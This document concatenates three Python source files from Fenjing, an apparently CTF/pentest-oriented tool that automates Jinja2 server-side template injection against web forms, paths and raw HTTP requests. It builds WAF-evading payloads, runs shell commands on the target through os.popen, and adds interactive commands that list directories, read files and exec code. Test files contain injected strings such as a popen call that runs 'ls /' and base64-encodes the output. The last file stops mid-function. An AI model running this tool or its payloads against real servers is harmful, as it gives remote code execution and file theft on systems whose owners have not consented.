"""命令行界面的入口

"""

import logging
import time
from urllib.parse import urlparse
from typing import List, Dict, Tuple, Union, Any
from enum import Enum
from functools import partial
from pathlib import Path
import click

from .const import (
    DetectMode,
    TemplateEnvironment,
    PythonEnvironment,
    ReplacedKeywordStrategy,
    OS_POPEN_READ,
    CONFIG,
    EVAL,
    STRING,
    DEFAULT_USER_AGENT,
)
from .colorize import colored, set_enable_coloring
from .cracker import Cracker, EvalArgsModePayloadGen, guess_python_version
from .form import Form, get_form
from .full_payload_gen import FullPayloadGen
from .requester import (
    HTTPRequester,
    TCPRequester,
    check_line_break,
    fix_line_break,
    check_tail,
    fix_tail,
)
from .submitter import (
    Submitter,
    PathSubmitter,
    FormSubmitter,
    TCPSubmitter,
    shell_tamperer,
)
from .scan_url import yield_form
from .webui import main as webui_main
from .interact import interact
from .options import Options

set_enable_coloring()

TITLE = colored(
    "yellow",
    r"""
    ____             _ _
   / __/__  ____    (_|_)___  ____ _
  / /_/ _ \/ __ \  / / / __ \/ __ `/
 / __/  __/ / / / / / / / / / /_/ /
/_/  \___/_/ /_/_/ /_/_/ /_/\__, /
              /___/        /____/

    ------Made with passion by Marven11
""".strip(
        "\n"
    ),
    bold=True,
)

LOGGING_FORMAT = "%(levelname)s:[%(name)s] | %(message)s"
logging.basicConfig(level=logging.INFO, format=LOGGING_FORMAT)
logger = logging.getLogger("cli")


class EnumOption(click.Option):
    """Make click prints more readable prompt for Enum.
    Provide better hint when user input is wrong"""

    def type_cast_value(self, ctx: click.Context, value: Any):
        # Enum class is a callable, so click converts it to FuncParamType
        if not isinstance(self.type, click.types.FuncParamType):
            raise RuntimeError("This should be used on Enum!")
        clazz: type = self.type.func  # type: ignore
        if not issubclass(clazz, Enum):
            raise RuntimeError("This should be used on Enum!")
        try:
            _ = self.type(value)
        except Exception as exc:
            raise click.exceptions.BadParameter(
                f"{repr(value)} must be one of {[x.value for x in clazz]}",
                ctx=ctx,
                param=self,
            ) from exc
        return super().type_cast_value(ctx, value)


class RunFailed(Exception):
    """用于通知main和unit test运行失败的exception"""


def do_submit_cmdexec(
    cmd: str,
    submitter: Submitter,
    full_payload_gen_like: Union[FullPayloadGen, EvalArgsModePayloadGen],
) -> str:
    """使用FullPayloadGen生成shell命令payload, 然后使用submitter发送至对应服务器, 返回回显
    如果cmd以@开头，则将其作为fenjing内部命令解析

    内部命令如下：
    - get-config: 获得当前的config
    - eval: 让目标python进程执行eval，解析命令后面的部分

    Args:
        cmd (str): payload对应的命令
        submitter (Submitter): 实际发送请求的submitter
        full_payload_gen_like (Union[FullPayloadGen, EvalArgsModePayloadGen]):
            生成payload的FullPayloadGen

    Returns:
        str: 回显
    """
    payload, will_print = None, None
    # 解析命令
    if cmd[0] == "@":
        cmd = cmd[1:]
        if cmd.startswith("get-config"):
            payload, will_print = full_payload_gen_like.generate(CONFIG)
        elif cmd.startswith("eval"):
            payload, will_print = full_payload_gen_like.generate(
                EVAL, (STRING, cmd[4:].strip())
            )
        elif cmd.startswith("ls"):
            cmd = cmd.strip()
            if len(cmd) == 2:  # ls
                payload, will_print = full_payload_gen_like.generate(
                    EVAL, (STRING, "__import__('os').listdir()")
                )
            else:  # ls xxx
                payload, will_print = full_payload_gen_like.generate(
                    EVAL, (STRING, f"__import__('os').listdir({repr(cmd[2:].strip())})")
                )
        elif cmd.startswith("cat"):
            filepath = cmd[3:].strip()
            payload, will_print = full_payload_gen_like.generate(
                EVAL, (STRING, f"open({repr(filepath)}, 'r').read()")
            )
        elif cmd.startswith("exec"):
            statements = cmd[4:].strip()
            payload, will_print = full_payload_gen_like.generate(
                EVAL, (STRING, f"exec({repr(statements)})")
            )
        else:
            logging.warning("Please check your command")
            return ""
    else:
        payload, will_print = full_payload_gen_like.generate(OS_POPEN_READ, cmd)
    # 使用payload
    if payload is None:
        logger.warning("%s generating payload.", colored("red", "Failed"))
        return ""
    logger.info("Submit payload %s", colored("blue", payload))
    if not will_print:
        payload_wont_print = (
            "Payload generator says that this payload %s command execution result."
        )
        logger.warning(payload_wont_print, colored("red", "won't print"))
    result = submitter.submit(payload)
    assert result is not None
    return result.text


def parse_headers_cookies(headers_list: List[str], cookies: str) -> Dict[str, str]:
    """将headers列表和cookie字符串解析为可以传给requests的字典

    Args:
        headers_list (List[str]): headers列表，元素的格式为'Key: value'
        cookies (str): Cookie字符串

    Returns:
        Dict[str, str]: Headers字典
    """
    headers = {}
    if headers_list:
        for header in headers_list:
            key, _, value = header.partition(": ")
            if not key or not value:
                logger.warning("Failed parsing %s, ignored.", repr(header))
                continue
            if key.capitalize() != key:
                logger.warning("Header %s is not capitalized, fixed.", key)
                key = key.capitalize()
            headers[key] = value
    if cookies:
        headers["Cookie"] = cookies
    return headers


def do_crack_form_pre(
    url: str,
    form: Form,
    requester: HTTPRequester,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    tamper_cmd: Union[str, None],
) -> Union[Tuple[FullPayloadGen, Submitter], None]:
    """攻击一个表单并获得用于生成payload的参数

    Args:
        url (str): 目标URL
        form (Form): 目标表单
        requester (HTTPRequester): 用于发送请求的requester
        detect_mode (DetectMode): 检测模式
        replaced_keyword_strategy (ReplacedKeywordStrategy): 如何处理被替换的关键字
        environment (TemplateEnvironment): 目标的模板渲染环境
        tamper_cmd (Union[str, None]): 对payload进行修改的修改命令

    Returns:
        Union[Tuple[FullPayloadGen, Submitter], None]: 攻击结果
    """
    python_version = guess_python_version(url, requester)
    for input_field in form["inputs"]:
        submitter = FormSubmitter(
            url,
            form,
            input_field,
            requester,
        )
        if tamper_cmd:
            tamperer = shell_tamperer(tamper_cmd)
            submitter.add_tamperer(tamperer)
        options = Options(
            detect_mode=detect_mode,
            replaced_keyword_strategy=replaced_keyword_strategy,
            environment=environment,
            python_version=python_version,
        )
        cracker = Cracker(submitter=submitter, options=options)
        if not cracker.has_respond():
            return None
        full_payload_gen = cracker.crack()
        if full_payload_gen:
            return full_payload_gen, submitter
    return None


def do_crack_form_eval_args_pre(
    url: str,
    form: Form,
    requester: HTTPRequester,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    tamper_cmd: Union[str, None],
) -> Union[Tuple[Submitter, EvalArgsModePayloadGen], None]:
    """攻击一个表单并获得结果，但是将payload放在GET/POST参数中提交

    Args:
        url (str): 目标url
        form (Form): 目标表格
        requester (HTTPRequester): 提交请求的requester
        detect_mode (DetectMode): 检测模式
        replaced_keyword_strategy (ReplacedKeywordStrategy): 如何对待被替换的关键字
        environment (TemplateEnvironment): 模板的渲染环境
        tamper_cmd (Union[str, None]): tamper命令

    Returns:
        Union[Tuple[Submitter, EvalArgsModePayloadGen], None]: 攻击结果
    """
    python_version = guess_python_version(url, requester)
    for input_field in form["inputs"]:
        submitter = FormSubmitter(
            url,
            form,
            input_field,
            requester,
        )
        if tamper_cmd:
            tamperer = shell_tamperer(tamper_cmd)
            submitter.add_tamperer(tamperer)
        options = Options(
            detect_mode=detect_mode,
            replaced_keyword_strategy=replaced_keyword_strategy,
            environment=environment,
            python_version=python_version,
        )
        cracker = Cracker(submitter=submitter, options=options)
        if not cracker.has_respond():
            return None
        result = cracker.crack_eval_args()
        if result:
            submitter, evalargs_payload_gen = result
            return submitter, evalargs_payload_gen
    return None


def do_crack_path_pre(
    url: str,
    requester: HTTPRequester,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    tamper_cmd: Union[str, None],
) -> Union[Tuple[FullPayloadGen, Submitter], None]:
    """攻击一个路径并获得payload生成器

    Args:
        url (str): 目标url
        requester (HTTPRequester): 发送请求的类
        detect_mode (DetectMode): 分析模式
        replaced_keyword_strategy (ReplacedKeywordStrategy): 如何对待被替换的关键字
        environment (TemplateEnvironment): 模板渲染环境
        tamper_cmd (Union[str, None]): tamper命令

    Returns:
        Union[Tuple[FullPayloadGen, Submitter], None]: 攻击结果
    """
    python_version = guess_python_version(url, requester)
    submitter = PathSubmitter(url=url, requester=requester)
    if tamper_cmd:
        tamperer = shell_tamperer(tamper_cmd)
        submitter.add_tamperer(tamperer)
    options = Options(
        detect_mode=detect_mode,
        replaced_keyword_strategy=replaced_keyword_strategy,
        environment=environment,
        python_version=python_version,
    )
    cracker = Cracker(submitter=submitter, options=options)
    if not cracker.has_respond():
        return None
    full_payload_gen = cracker.crack()
    if full_payload_gen is None:
        return None
    return full_payload_gen, submitter


def do_crack_request_pre(
    submitter: TCPSubmitter,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
) -> Union[FullPayloadGen, None]:
    """根据指定的请求文件进行攻击并获得结果

    Args:
        submitter (TCPSubmitter): 发送payload的类
        detect_mode (DetectMode): 攻击模式
        replaced_keyword_strategy (ReplacedKeywordStrategy): 如何对待被替换的关键字
        environment (TemplateEnvironment): 模板执行环境

    Returns:
        Union[FullPayloadGen, None]: 攻击结果
    """
    # 根据指定的请求文件进行攻击并获得结果

    # Args:
    #     submitter (TCPSubmitter): 发送payload的类
    #     detect_mode (str): 攻击模式
    #     replaced_keyword_strategy (str): 被替换关键字的策略
    #     environment (str): 模板执行环境
    #     tamper_cmd (Union[str, None]): tamper命令

    # Returns:
    #     Union[FullPayloadGen, None]: 攻击结果
    #
    options = Options(
        detect_mode=detect_mode,
        replaced_keyword_strategy=replaced_keyword_strategy,
        environment=environment,
        python_version=PythonEnvironment.UNKNOWN,
    )
    cracker = Cracker(submitter=submitter, options=options)
    if not cracker.has_respond():
        return None
    full_payload_gen = cracker.crack()
    if full_payload_gen is None:
        return None
    return full_payload_gen


def do_crack(
    full_payload_gen: FullPayloadGen, submitter: Submitter, exec_cmd: Union[str, None]
):
    """使用payload生成器攻击对应的表单参数/路径

    Args:
        full_payload_gen (FullPayloadGen): payload生成器
        submitter (Submitter): payload提交器，用于提交payload到特定的表单/路径
        exec_cmd (Union[str, None]): 需要执行的命令
    """
    cmd_exec_func = partial(
        do_submit_cmdexec,
        submitter=submitter,
        full_payload_gen_like=full_payload_gen,
    )
    if exec_cmd:
        print(cmd_exec_func(exec_cmd))
    else:
        interact(cmd_exec_func)


def do_crack_eval_args(
    submitter: Submitter,
    eval_args_payloadgen: EvalArgsModePayloadGen,
    exec_cmd: Union[str, None],
):
    """攻击对应的表单参数/路径，但是使用eval_args方法

    Args:
        submitter (Submitter): payload提交器，用于提交payload到特定的表单/路径
        eval_args_payloadgen (EvalArgsModePayloadGen): EvalArgs的payload生成器
        exec_cmd (Union[str, None]): 需要执行的命令
    """
    cmd_exec_func = partial(
        do_submit_cmdexec,
        submitter=submitter,
        full_payload_gen_like=eval_args_payloadgen,
    )
    if exec_cmd:
        print(cmd_exec_func(exec_cmd))
    else:
        interact(cmd_exec_func)


common_options_cli = [
    click.option(
        "--exec-cmd",
        "-e",
        default="",
        help="成功后执行的shell指令，不填则成功后进入交互模式",
    ),
    click.option(
        "--detect-mode",
        type=DetectMode,
        cls=EnumOption,
        default=DetectMode.ACCURATE,
        help="分析模式，可为accurate或fast",
    ),
    click.option(
        "--replaced-keyword-strategy",
        default=ReplacedKeywordStrategy.AVOID,
        type=ReplacedKeywordStrategy,
        cls=EnumOption,
        help="WAF替换关键字时的策略，可为avoid/ignore/doubletapping",
    ),
    click.option(
        "--environment",
        default=TemplateEnvironment.JINJA2,
        type=TemplateEnvironment,
        cls=EnumOption,
        help="模板的执行环境，默认为不带flask全局变量的普通jinja2",
    ),
    click.option(
        "--tamper-cmd",
        default="",
        help="在发送payload之前进行编码的命令，默认不进行额外操作",
    ),
    click.option("--interval", default=0.0, help="每次请求的间隔"),
]

common_options_http = [
    click.option("--url", "-u", required=True, help="需要攻击的URL"),
    click.option(
        "--user-agent", default=DEFAULT_USER_AGENT, help="请求时使用的User Agent"
    ),
    click.option("--header", default=[], multiple=True, help="请求时使用的Headers"),
    click.option("--cookies", default="", help="请求时使用的Cookie"),
    click.option("--extra-params", default=None, help="请求时的额外GET参数，如a=1&b=2"),
    click.option("--extra-data", default=None, help="请求时的额外POST参数，如a=1&b=2"),
    click.option("--proxy", default="", help="请求时使用的代理"),
]


def add_options(options):
    """应用列表中的click option装饰器"""

    def decorator(f):
        for option in options:
            f = option(f)
        return f

    return decorator


@click.group()
def main():
    """click的命令组"""


@main.command()
@add_options(common_options_http)
@add_options(common_options_cli)
@click.option(
    "--action",
    "-a",
    default=None,
    help="参数的提交路径，如果和URL中的路径不同则需要填入",
)
@click.option("--method", "-m", default="POST", help="参数的提交方式，默认为POST")
@click.option("--inputs", "-i", required=True, help="所有参数，以逗号分隔")
@click.option(
    "--eval-args-payload",
    default=False,
    is_flag=True,
    help="是否开启在GET参数中传递Eval payload的功能",
)
def crack(
    url: str,
    action: str,
    method: str,
    inputs: str,
    exec_cmd: str,
    interval: float,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    eval_args_payload: bool,
    user_agent: str,
    header: tuple,
    cookies: str,
    extra_params: str,
    extra_data: str,
    proxy: str,
    tamper_cmd: str,
):
    """
    攻击指定的表单
    """
    print(TITLE)
    assert all(param is not None for param in [url, inputs]), "Please check your param"
    form = get_form(
        action=action or urlparse(url).path,
        method=method,
        inputs=inputs.split(","),
    )
    requester = HTTPRequester(
        interval=interval,
        user_agent=user_agent,
        headers=parse_headers_cookies(headers_list=list(header), cookies=cookies),
        extra_params_querystr=extra_params,
        extra_data_querystr=extra_data,
        proxy=proxy,
    )
    if not eval_args_payload:
        result = do_crack_form_pre(
            url,
            form,
            requester,
            detect_mode,
            replaced_keyword_strategy,
            environment,
            tamper_cmd,
        )
        if not result:
            logger.warning("Test form failed...")
            raise RunFailed()
        full_payload_gen, submitter = result
        do_crack(full_payload_gen, submitter, exec_cmd)
    else:
        result = do_crack_form_eval_args_pre(
            url,
            form,
            requester,
            detect_mode,
            replaced_keyword_strategy,
            environment,
            tamper_cmd,
        )
        if not result:
            logger.warning("Test form failed...")
            raise RunFailed()
        submitter, evalargs_payload_gen = result
        do_crack_eval_args(submitter, evalargs_payload_gen, exec_cmd)


@main.command()
@add_options(common_options_http)
@add_options(common_options_cli)
def crack_path(
    url: str,
    exec_cmd: str,
    interval: float,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    user_agent: str,
    header: tuple,
    cookies: str,
    extra_params: str,
    extra_data: str,
    proxy: str,
    tamper_cmd: str,
):
    """
    攻击指定的路径
    """
    assert url is not None, "Please provide URL!"
    print(TITLE)
    requester = HTTPRequester(
        interval=interval,
        user_agent=user_agent,
        headers=parse_headers_cookies(headers_list=list(header), cookies=cookies),
        extra_params_querystr=extra_params,
        extra_data_querystr=extra_data,
        proxy=proxy,
    )
    result = do_crack_path_pre(
        url,
        requester,
        detect_mode,
        replaced_keyword_strategy,
        environment,
        tamper_cmd,
    )
    if not result:
        logger.warning("Test form failed...")
        raise RunFailed()
    full_payload_gen, submitter = result
    do_crack(full_payload_gen, submitter, exec_cmd)


@main.command()
@add_options(common_options_http)
@add_options(common_options_cli)
def scan(
    url,
    exec_cmd,
    interval,
    detect_mode,
    replaced_keyword_strategy,
    environment,
    user_agent,
    header,
    cookies,
    extra_params,
    extra_data,
    proxy,
    tamper_cmd: str,
):
    """
    扫描指定的网站
    """
    print(TITLE)
    requester = HTTPRequester(
        interval=interval,
        user_agent=user_agent,
        headers=parse_headers_cookies(headers_list=list(header), cookies=cookies),
        extra_params_querystr=extra_params,
        extra_data_querystr=extra_data,
        proxy=proxy,
    )
    url_forms = (
        (page_url, form)
        for (page_url, forms) in yield_form(requester, url)
        for form in forms
    )
    for page_url, form in url_forms:
        logger.warning("Scan form: %s", colored("blue", repr(form)))
        result = do_crack_form_pre(
            page_url,
            form,
            requester,
            detect_mode,
            replaced_keyword_strategy,
            environment,
            tamper_cmd,
        )
        if not result:
            continue
        full_payload_gen, submitter = result
        do_crack(full_payload_gen, submitter, exec_cmd)
        return
    logger.warning("Scan failed...")
    logger.warning(
        "Try to pass params manualy: "
        + "python -m fenjing crack %s --inputs aaa,bbb --method GET",
        url,
    )

    raise RunFailed()


@main.command()
@add_options(common_options_cli)
@click.option("--host", "-h", required=True, help="目标的host，可为IP或域名")
@click.option("--port", "-p", required=True, type=int, help="目标的端口")
@click.option(
    "--request-file",
    "-f",
    required=True,
    help="保存在文本文件中的请求，其中payload处为PAYLOAD",
)
@click.option(
    "--toreplace", default=b"PAYLOAD", type=bytes, help="请求文件中payload的占位符"
)
@click.option("--ssl/--no-ssl", default=False, help="是否使用SSL")
@click.option("--urlencode-payload", default=True, help="是否对payload进行urlencode")
@click.option("--raw", is_flag=True, default=False, help="不检查请求的换行符等")
@click.option("--retry-times", default=5, help="重试次数")
@click.option("--update-content-length", default=True, help="自动更新Content-Length")
def crack_request(
    host: str,
    port: int,
    request_file: str,
    toreplace: bytes,
    ssl: bool,
    exec_cmd: str,
    urlencode_payload: bool,
    raw: bool,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    retry_times: int,
    interval: float,
    tamper_cmd: str,
    update_content_length: bool
):
    """
    从文本文件中读取请求并攻击目标，文本文件中用`PAYLOAD`标记payload插入位置
    """
    request_filepath = Path(request_file)
    if not request_filepath.is_file():
        logger.error("File doesn't exist: %s", request_filepath)
    request_pattern = request_filepath.read_bytes()
    if not raw and not check_tail(request_pattern):
        logger.warning("Request doesn't ends with '\\r\\n\\r\\n', fixing...")
        logger.warning("You can use `--raw` flag to disable this")
        request_pattern = fix_tail(request_pattern)
        time.sleep(2)
    if not raw and not check_line_break(request_pattern):
        logger.warning("Request's linebreak is not '\\r\\n', fixing...")
        logger.warning("You can use `--raw` flag to disable this")
        request_pattern = fix_line_break(request_pattern)
        time.sleep(2)

    requester = TCPRequester(
        host=host, port=port, use_ssl=ssl, retry_times=retry_times, interval=interval
    )
    submitter = TCPSubmitter(
        requester=requester,
        pattern=request_pattern,
        toreplace=toreplace,
        urlencode_payload=urlencode_payload,
        enable_update_content_length=update_content_length
    )
    if tamper_cmd:
        tamperer = shell_tamperer(tamper_cmd)
        submitter.add_tamperer(tamperer)
    full_payload_gen = do_crack_request_pre(
        submitter=submitter,
        detect_mode=detect_mode,
        replaced_keyword_strategy=replaced_keyword_strategy,
        environment=environment,
    )
    if not full_payload_gen:
        logger.warning("Crack request failed...")
        raise RunFailed()
    do_crack(full_payload_gen, submitter, exec_cmd)


@main.command()
@click.option(
    "--host", "-h", default="127.0.0.1", help="需要监听的host, 默认为127.0.0.1"
)
@click.option("--port", "-p", default=11451, help="需要监听的端口, 默认为11451")
@click.option(
    "--open-browser/--no-open-browser", default=True, help="是否自动打开浏览器"
)
def webui(host, port, open_browser):
    """
    启动webui
    """
    webui_main(host, port, open_browser)


if __name__ == "__main__":
    main()



import sys  # noqa

sys.path.append("..")  # noqa

import unittest
import fenjing


from fenjing.payload_gen import PayloadGenerator, expression_gens
from fenjing import const
import logging

from jinja2 import Template, TemplateError

fenjing.payload_gen.logger.setLevel(logging.ERROR)


def get_payload_gen(blacklist, context):
    def waf_func(x):
        return all(word not in x for word in blacklist)

    return PayloadGenerator(waf_func, context)



class PayloadGenTestsTargetRules(unittest.TestCase):

    def setUp(self):
        super().setUp()
        self.context = {
            "l": 1,
            "e": 3,
            "lo": 10,
            "loo": 100,
            "eoo": 300,
        }
        self.context_payload = "{%set l=1%}{%set e=3%}{%set lo=10%}{%set loo=100%}{%set eoo=300%}"
        self.payload_gen = get_payload_gen([],self.context)

    def target_test(self, target):
        gen_type = target[0]
        for gen_func in expression_gens[gen_type]:
            try:
                target_list = gen_func(self.context, *target[1:])
            except Exception as e:
                raise RuntimeError(f"Generate failed for rule {gen_func.__name__}") from e
            result = self.payload_gen.generate_by_list(target_list)

            if not result:
                continue
            try:
                str_result, _, _ = result
                Template(self.context_payload + f"Hello, {str_result}").render()
            except TemplateError as e:
                raise RuntimeError(f"Render failed for rule {gen_func.__name__}") from e

    def test_targets(self):
        targets = [
            (const.VARIABLE_OF, "%c"),
            (const.ZERO, ),
            (const.INTEGER, 11),
            (const.INTEGER, 123),
            (const.PLUS, (const.INTEGER, 98), (const.INTEGER, 37)),
            (const.MULTIPLY, (const.INTEGER, 3), (const.INTEGER, 37)),
            (const.MULTIPLY, (const.STRING, "a"), (const.INTEGER, 11)),

            (const.STRING_PERCENT,),
            (const.STRING_LOWERC,),
            (const.STRING_PERCENT_LOWER_C, ),
            (const.STRING_MANY_PERCENT_LOWER_C, 11),
            (const.STRING, "a"),
            (const.STRING, "__class__"),
            (const.STRING, "echo 'cracked\"\\'"),
            (const.STRING, "ls /;"),

            (const.MODULE_OS),
            (const.OS_POPEN_READ, "echo 'cracked\"\\'"),
        ]
        for target in targets:
            logging.info("Testing target: %s", repr(target))
            self.target_test(target)


class PayloadGenTestCaseSimple(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.payload_gen = get_payload_gen(
            [
                "[",
            ],
            {},
        )

    def test_string(self):
        strings = [
            "123",
            "asdf",
            "__dunder__",
            "__import__('os').popen('echo test_command/$(ls / | base64 -w)').read()",
        ]
        for string in strings:
            self.assertIsNotNone(self.payload_gen.generate(const.STRING, string))

    def test_os_popen_read(self):
        self.assertIsNotNone(
            self.payload_gen.generate(const.OS_POPEN_READ, "echo fen  jing;")
        )


class PayloadGenTestCaseNoNumber(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.payload_gen = get_payload_gen(
            ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"],
            {
                "l": 1,
                "e": 3,
                "lo": 10,
                "loo": 100,
                "eoo": 300,
            },
        )

    def test_integers(self):
        for num in range(1, 128):
            self.assertIsNotNone(self.payload_gen.generate(const.INTEGER, num))

    def test_string(self):
        strings = [
            "123",
            "asdf",
            "__dunder__",
            "__import__('os').popen('echo test_command/$(ls / | base64 -w)').read()",
        ]
        for string in strings:
            self.assertIsNotNone(self.payload_gen.generate(const.STRING, string))

    def test_os_popen_read(self):
        self.assertIsNotNone(
            self.payload_gen.generate(const.OS_POPEN_READ, "echo fen  jing;")
        )


class PayloadGenTestCaseHard(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.payload_gen = get_payload_gen(
            [
                "config",
                "self",
                "g",
                "os",
                "class",
                "length",
                "mro",
                "base",
                "lipsum",
                "[",
                '"',
                "'",
                "_",
                ".",
                "+",
                "~",
                "{{",
                "0",
                "1",
                "2",
                "3",
                "4",
                "5",
                "6",
                "7",
                "8",
                "9",
                "０",
                "１",
                "２",
                "３",
                "４",
                "５",
                "６",
                "７",
                "８",
                "９",
            ],
            {
                "l": 1,
                "e": 3,
                "lo": 10,
                "loo": 100,
                "eoo": 300,
            },
        )

    def test_targets(self):
        targets = [
            (const.STRING_PERCENT, ),
            (const.STRING_LOWERC, ),
            (const.INTEGER, 11),
            (const.STRING, "a"),
            (const.STRING_PERCENT_LOWER_C, ),
            (const.STRING_MANY_PERCENT_LOWER_C, 11),
            (const.STRING, "ls /;"),
        ]
        for target in targets:
            result = self.payload_gen.generate(target[0], *target[1:])
            self.assertIsNotNone(result, repr(target))


    def test_string(self):
        strings = [
            "123",
            "asdf",
            "__dunder__",
            "__import__('os').popen('echo test_command/$(ls / | base64 -w)').read()",
        ]
        for string in strings:
            self.assertIsNotNone(self.payload_gen.generate(const.STRING, string), string)

    def test_os_popen_read(self):
        self.assertIsNotNone(
            self.payload_gen.generate(const.OS_POPEN_READ, "echo fen  jing;")
        )



"""实际发出网络请求并返回响应
"""

import logging
import traceback
import time
import socket
import ssl
import re
from urllib.parse import parse_qs
from typing import Union, Tuple
import requests

from fenjing.colorize import colored
from .const import DEFAULT_USER_AGENT

logger = logging.getLogger("requester")

# 处理bytes形式的HTTP请求的一系列函数
Response = Tuple[int, str]


def check_line_break(req_pattern: bytes) -> Union[None, bool]:
    """检查换行符，提取Host header前方的换行符并检查

    Args:
        req_pattern (bytes): HTTP请求的模板

    Returns:
        Union[None, bool]: 检查结果，失败时为None
    """
    linebreak_pos = req_pattern.find(b"Host: ")
    if not linebreak_pos:
        return None
    linebreak = req_pattern[linebreak_pos - 2 : linebreak_pos]
    linebreak = bytes(c for c in linebreak if c in b"\r\n")
    if linebreak == b"\r\n" or linebreak == b"\n\r":
        return True
    elif linebreak == b"\n":
        return False
    return None


def fix_line_break(req_pattern: bytes) -> bytes:
    """修正换行符

    Args:
        req_pattern (bytes): 需要修正的请求模板

    Returns:
        bytes: 修正结果
    """
    line_header, _, body = req_pattern.partition(b"\n\n")
    return line_header.replace(b"\n", b"\r\n") + b"\r\n\r\n" + body


def get_tail(req_pattern: bytes) -> Tuple[Union[bytes, None], int]:
    """获得HTTP请求结尾的换行符

    Args:
        req_pattern (bytes): 需要检查的请求模板

    Returns:
        Tuple[Union[bytes, None], int]: 检查结果，换行符以及数量
            找不到时返回None, 0
    """
    lbs = [
        b"\r\n",
        b"\n\r",
        b"\n",
    ]
    for lb in lbs:
        if req_pattern[-len(lb) :] == lb:
            count = 1
            while req_pattern[-count * len(lb) :] == lb * count:
                count += 1
            count -= 1
            return lb, count
    return None, 0


def check_tail(req_pattern: bytes) -> bool:
    """检查HTTP结尾的换行符

    Args:
        req_pattern (bytes): 需要检查的HTTP请求模板

    Returns:
        bool: 检查结果
    """
    return get_tail(req_pattern)[1] == 2


def fix_tail(req_pattern: bytes) -> bytes:
    """修复HTTP请求结尾的换行符

    Args:
        req_pattern (bytes): 请求

    Returns:
        bytes: 修复结果
    """
    lb, count = get_tail(req_pattern)
    if lb is None:
        return req_pattern
    if count <= 2:
        return req_pattern + lb * (2 - count)
    return req_pattern[: -len(lb) * 2 - count]


class TCPRequester:
    """通过创建TCP Socket直接发送原始请求的类"""

    def __init__(
        self,
        host: str,
        port: int,
        use_ssl: bool,
        retry_times=5,
        interval=0.05,
    ):
        self.host = host
        self.port = port
        self.use_ssl = use_ssl
        self.interval = interval
        self.retry_times = retry_times
        self.last_request_time: Union[float, None] = None

    def _get_socket(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        if self.use_ssl:
            ssl_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
            sock = ssl_context.wrap_socket(sock)
        sock.connect((self.host, self.port))
        return sock

    def _recv_all(self, sock, bufsize=1024):
        data = b""
        while True:
            chunk = sock.recv(bufsize)
            if not chunk:
                break
            data += chunk
        return data

    def _request_once(self, request: bytes):
        if self.last_request_time:
            duration = time.perf_counter() - self.last_request_time
            if duration < self.interval:
                time.sleep(self.interval - duration)
        self.last_request_time = time.perf_counter()

        try:
            sock = self._get_socket()
        except Exception as exception:
            logger.warning("Get socket failed: %s", repr(exception))
            logger.debug(traceback.format_exc())
            return None

        try:
            sock.sendall(request)
        except Exception as exception:
            logger.warning("Send request failed: %s", repr(exception))
            logger.debug(traceback.format_exc())
            return None

        response = None
        try:
            response = self._recv_all(sock)
        except Exception as exception:
            logger.warning("Receive response failed: %s", repr(exception))
            logger.debug(traceback.format_exc())
            return None
        response = response.decode()
        status_code_result = re.search(r"\d{3}", response.partition("\n")[0])
        if status_code_result is None:
            logging.warning("Failed to find status code: %s", response)
            return None

        try:
            sock.close()
        except Exception as exception:
            logger.warning("Close socket failed, ignoring... %s", repr(exception))

        return int(status_code_result.group(0)), response.partition("\r\n\r\n")[2]

    def request(self, request: bytes) -> Union[Response, None]:
        """发送bytes形式的HTTP请求

        Args:
            request (bytes): 请求

        Returns:
            Union[Response, None]: 响应
        """
        for _ in range(self.retry_times):
            resp = self._request_once(request)
            if resp is not None:
                return resp
        return None


class HTTPRequester:
    """实际发送HTTP请求的类"""

    def __init__(
        self,
        interval=0.0,
        timeout=10,
        retry_times=5,
        retry_interval=1,
        retry_status=(429,),
        user_agent=DEFAULT_USER_AGENT,
        headers=None,
        extra_params_querystr=None,
        extra_data_querystr=None,
        proxy=None,
    ):
        self.interval = interval
        self.timeout = timeout
        self.retry_times = retry_times
        self.retry_interval = retry_interval
        self.retry_status = retry_status
        self.session = requests.Session()
        self.session.headers.update({"User-Agent": user_agent})
        self.last_request_time = 0
        self.extra_params = {}
        self.extra_data = {}

        if interval > 1:
            logger.warning(
                "Request interval might be %s: %.2fs between two requests.",
                colored("yellow", "too large"),
                interval,
            )

        if headers:
            self.session.headers.update(headers)

        if extra_params_querystr:
            self.extra_params = parse_qs(extra_params_querystr)

        if extra_data_querystr:
            self.extra_data = parse_qs(extra_data_querystr)

        if proxy:
            self.session.proxies = {"http": proxy, "https": proxy}

    def request_once(self, **kwargs):
        """发出一次网络请求，失败时返回None

        Returns:
            Union[Response, None]: 返回的响应
        """
        duration = time.perf_counter() - self.last_request_time
        if duration < self.interval:
            time.sleep(self.interval - duration)

        if "timeout" not in kwargs:
            kwargs["timeout"] = self.timeout
        resp = None
        try:
            resp = self.session.request(**kwargs)
        except Exception as exception:  # pylint: disable=W0718
            logger.warning("Request failed with exception: %s", repr(exception))
            logger.debug(traceback.format_exc())
            return None
        if resp.status_code in self.retry_status:
            logger.warning(
                "%s: status code is %s, try to sleep +1s",
                colored("yellow", "Rate limit", bold=True),
                colored("yellow", str(resp.status_code)),
            )
            logger.warning(
                "You might want to use `--interval` option to set request interval."
            )
            time.sleep(1)
            return None
        if resp.status_code not in [200, 500]:
            logger.warning(
                "Not expected status code: %s ... continue anyway",
                colored("yellow", str(resp.status_code)),
            )

        self.last_request_time = time.perf_counter()
        return resp

    def request(self, **kwargs):
        """发送请求，自动重试

        Returns:
            Union[Response, None]: 响应
        """
        if self.extra_params:
